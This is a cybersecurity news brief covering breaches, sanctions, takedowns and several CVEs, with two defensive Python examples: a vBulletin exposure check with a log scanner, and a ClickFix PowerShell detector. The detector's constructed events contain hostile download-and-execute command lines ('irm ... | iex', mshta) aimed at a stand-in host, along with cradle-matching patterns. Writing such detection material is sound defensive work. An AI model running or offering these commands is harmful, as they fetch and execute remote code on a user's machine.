Svoboda Cybersecurity Brief May 31, 2025

May 31, 2025


U.S. Government Employee Arrested for Attempting to Provide Classified Information to Foreign Government

A Defense Intelligence Agency IT specialist, Nathan Vilas Laatsch, was arrested for attempting to transmit classified information to a foreign government. He allegedly transcribed and exfiltrated Top Secret documents over several days, using thumb drives and covert drop locations. The FBI intercepted the data and arrested him during a planned exchange.
Source: DataBreaches.net

ConnectWise Hit by Suspected State-Sponsored Cyberattack

ConnectWise disclosed a breach by a sophisticated nation-state actor that affected a small number of ScreenConnect customers. The company engaged Mandiant and patched CVE-2025-3935, a high-severity ASP.NET ViewState code injection flaw in ScreenConnect, although it has not confirmed whether that flaw was the intrusion vector. Enhanced monitoring and hardening measures were implemented.
Source: The Hacker News

Australian Government Mandates Ransomware Payment Reporting

Australia became the first country to require ransomware victims with annual turnover above AUD 3 million to report any payment to cybercriminals within 72 hours. The law aims to track and disrupt the ransomware economy; smaller businesses are exempt from the reporting duty.
Source: DataBreaches.net

U.S. Sanctions Funnull for Facilitating $200M Cryptocurrency Scams

The U.S. sanctioned Funnull Technology Inc., a Philippines-based CDN provider, for hosting pig butchering scam websites linked to $200M in losses. Funnull fronted those sites with IP space rented from U.S. cloud providers, lending them the providers' reputation, and generated large numbers of domain names with domain-generation algorithms (DGAs).
Source: KrebsOnSecurity

vBulletin Forum Software Exploited in Critical RCE Attacks

CVE-2025-48827 (CVSS 10.0) and CVE-2025-48828 (CVSS 9.0) allow unauthenticated RCE in vBulletin 5.0.0–5.7.5 and 6.0.0–6.0.3 via PHP Reflection API abuse that exposes the replaceAdTemplate API method to unauthenticated callers. Public PoCs exist, and active exploitation against the ajax/api/ad/replaceAdTemplate endpoint has been observed.
Impact: Attackers gain remote code execution, and a shell on the web server, via template engine abuse.
Mitigation: Upgrade to vBulletin 6.1.1 or apply the vendor patch levels (PL1 for v6.x, PL3 for v5.7.5); review web server logs for requests to the endpoint above.
Source: BleepingComputer
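Two checks a defender would run after reading this item, as an added example (not code from the brief, from vBulletin or from BleepingComputer): a version check against the affected ranges and patch levels the brief lists, and a scan of combined-format web access logs for requests to the replaceAdTemplate endpoint. The log lines are constructed for illustration; the assumption that the endpoint path is matched case-insensitively and may sit under a subdirectory install (for example /forum/) is the example's own.

```python
"""Added example: vBulletin exposure check and access-log triage for the
replaceAdTemplate endpoint. Sample log lines are constructed, not real data."""
import re

# Affected ranges from the brief, inclusive.
AFFECTED = [((5, 0, 0), (5, 7, 5)), ((6, 0, 0), (6, 0, 3))]

# Endpoint named in the brief; matched case-insensitively as a suffix so that
# subdirectory installs (e.g. /forum/ajax/...) are caught too (assumption).
TARGET = "ajax/api/ad/replaceadtemplate"

# Constructed sample in Apache/nginx combined log format.
SAMPLE_LOG = """\
203.0.113.7 - - [30/May/2025:09:14:02 +0000] "POST /ajax/api/ad/replaceAdTemplate HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.23 - - [30/May/2025:09:14:05 +0000] "GET /forum/threads/hello.123/ HTTP/1.1" 200 9034 "-" "Mozilla/5.0"
203.0.113.7 - - [30/May/2025:09:14:09 +0000] "GET /ajax/api/ad/replaceAdTemplate?styleid=1 HTTP/1.1" 500 0 "-" "curl/8.4.0"
192.0.2.55 - - [30/May/2025:09:15:41 +0000] "POST /ajax/api/user/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)


def parse_version(s: str) -> tuple:
    """'5.7.5' -> (5, 7, 5); tolerates a trailing tag such as '5.7.5 PL3'."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", s.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {s!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version: str, patch_level: int = 0) -> bool:
    """True if this version/patch-level combination is still exposed.

    Patch levels follow the brief: PL3 fixes 5.7.5 and PL1 fixes the 6.x
    releases. Older 5.x releases have no patch level and must be upgraded.
    """
    v = parse_version(version)
    if not any(lo <= v <= hi for lo, hi in AFFECTED):
        return False
    if v == (5, 7, 5) and patch_level >= 3:
        return False
    if v[0] == 6 and patch_level >= 1:
        return False
    return True


def suspicious_requests(log_text: str) -> list:
    """Return parsed records for every request that hit the target endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        rec = m.groupdict()
        path = rec["path"].split("?", 1)[0].lstrip("/").lower()
        if path.endswith(TARGET):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for ver, pl in [("5.7.5", 0), ("5.7.5", 3), ("6.0.3", 1), ("6.1.1", 0)]:
        print(f"{ver} PL{pl}: {'AFFECTED' if is_affected(ver, pl) else 'ok'}")
    for rec in suspicious_requests(SAMPLE_LOG):
        print(f"{rec['ts']} {rec['ip']} {rec['method']} {rec['path']} -> {rec['status']} ({rec['ua']})")
```

A 500 on the endpoint is worth as much attention as a 200: a failed payload still shows someone probing the method, and the source IP and user agent give the pivot for the rest of the log.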

Law Enforcement Seizes AVCheck and Threat Actor Tools in Operation Endgame

AVCheck, a counter-antivirus service that let criminals test whether their malware was detected by commercial antivirus engines, and linked crypting services were seized by international law enforcement. The takedown disrupted ransomware groups that relied on these tools to evade detection. The operation involved Dutch, Finnish, and U.S. agencies.
Source: BleepingComputer

APT41 Exploits Google Calendar for C2 in Government Attacks

China-linked APT41 delivered its ToughProgress malware through phishing links and used Google Calendar as the command-and-control channel in attacks on government targets. The malware polled Calendar events for operator commands and wrote results back as encrypted event descriptions, so its C2 traffic went to a legitimate Google domain. Google disrupted the infrastructure.
Source: SecurityWeek

Earth Lamia Targets SAP and SQL Servers Across Asia

China-linked Earth Lamia exploited SAP NetWeaver CVE-2025-31324 and SQL injection flaws to breach logistics, retail, and government targets. The group deployed Cobalt Strike, Supershell, and custom backdoors like PULSEPACK. Recent attacks shifted focus to universities and IT firms.
Source: The Hacker News

Comstar LLC Settles with HHS Over Ransomware Breach Affecting 585K Patients

Comstar LLC agreed to a $75,000 fine and corrective action plan after a 2022 ransomware attack exposed ePHI of 585,621 individuals. HHS found the company failed to conduct proper risk analysis or update breach reports.
Source: DataBreaches.net

New EDDIESTEALER Malware Bypasses Chrome Encryption via ClickFix Campaign

EDDIESTEALER, a Rust-based infostealer, is delivered through ClickFix lures: fake CAPTCHA pages that instruct users to paste and run a PowerShell command themselves. It steals browser data and cryptocurrency wallets, and it defeats Chrome's app-bound encryption with a Rust port of ChromeKatz, which reads the already-decrypted cookies out of the browser's memory instead of the on-disk database.
Source: The Hacker News
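The ClickFix delivery described above leaves a distinctive process-creation trace: the user, not a browser or Office process, launches PowerShell, and the pasted one-liner downloads and executes remote code. The following is an added example (not code from the brief, from The Hacker News or from any vendor) of a heuristic over such events. Field names mirror Sysmon Event ID 1, the events are constructed, and the indicator set (explorer.exe as parent, download-cradle keywords, hidden-window and execution-policy flags, the "I am not a robot" text that lures append to the command) is this example's own assumption rather than a published signature.

```python
"""Added example: flag ClickFix-style user-launched PowerShell from
process-creation events. Events below are constructed for illustration."""
import re

# The user runs the pasted command from the Run dialog or a shell, so the
# parent is the desktop shell rather than a browser/Office process (assumption).
USER_SHELL_PARENTS = {"explorer.exe"}
CHILD_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Download-and-execute cradles commonly seen in pasted one-liners (assumption).
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"start-bitstransfer|\bcurl\b|mshta\s+https?://)", re.I)
# Flags that hide the window or relax policy for the pasted command.
EVASION = re.compile(
    r"(-(w|win|windowstyle)\s+hidden|-enc(odedcommand)?\b|-nop\b|"
    r"-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass)", re.I)
# Fake-CAPTCHA lures often append this text so the Run box looks legitimate.
LURE_TEXT = re.compile(r"(not a robot|verification id|verify you are human)", re.I)

# Constructed Sysmon-style process-creation events.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe",            # admin opened a console: benign
     "User": "CORP\\alice"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": ('powershell -w hidden -ep bypass -c "irm '
                     'https://captcha.example.invalid/v.txt | iex" '
                     '# I am not a robot - reCAPTCHA Verification ID: 7842'),
     "User": "CORP\\bob"},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": "pwsh -NoProfile -File .\\build.ps1",   # dev build: benign
     "User": "CORP\\carol"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://captcha.example.invalid/verify.hta",
     "User": "CORP\\dave"},
]


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of matched indicators; an empty list means not flagged."""
    if basename(event["ParentImage"]) not in USER_SHELL_PARENTS:
        return []
    if basename(event["Image"]) not in CHILD_IMAGES:
        return []
    cmd = event["CommandLine"]
    reasons = []
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download-cradle")
    if EVASION.search(cmd):
        reasons.append("evasion-flags")
    if LURE_TEXT.search(cmd):
        reasons.append("captcha-lure-text")
    return reasons


def clickfix_alerts(events: list) -> list:
    """(user, reasons) for every event that matches at least one indicator."""
    alerts = []
    for e in events:
        reasons = classify(e)
        if reasons:
            alerts.append((e["User"], reasons))
    return alerts


if __name__ == "__main__":
    for user, reasons in clickfix_alerts(EVENTS):
        print(f"ALERT {user}: {', '.join(reasons)}")
```

A plain console launch from explorer.exe is not flagged, and neither is a build script spawned by an editor; the cradle, the evasion flags and the lure comment are what separate a pasted ClickFix command from ordinary administrative use. Tune the parent set to your estate (some lures are pasted into a terminal, so the parent may be a terminal host) before deploying anything like this as a rule.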

CISA and ACSC Release SIEM/SOAR Implementation Guidance

CISA and ACSC published guidance for organizations adopting SIEM/SOAR platforms, emphasizing log prioritization and integration. The documents target both executives and practitioners, focusing on improving incident detection and response.
Source: SecurityWeek

MITRE Publishes Post-Quantum Cryptography Migration Roadmap

MITRE's Post-Quantum Cryptography Coalition (PQCC) released a roadmap for transitioning to quantum-safe cryptography, outlining stages such as preparation, planning, execution, and monitoring. The guidance addresses the risk that future quantum computers will break today's public-key algorithms.
Source: SecurityWeek
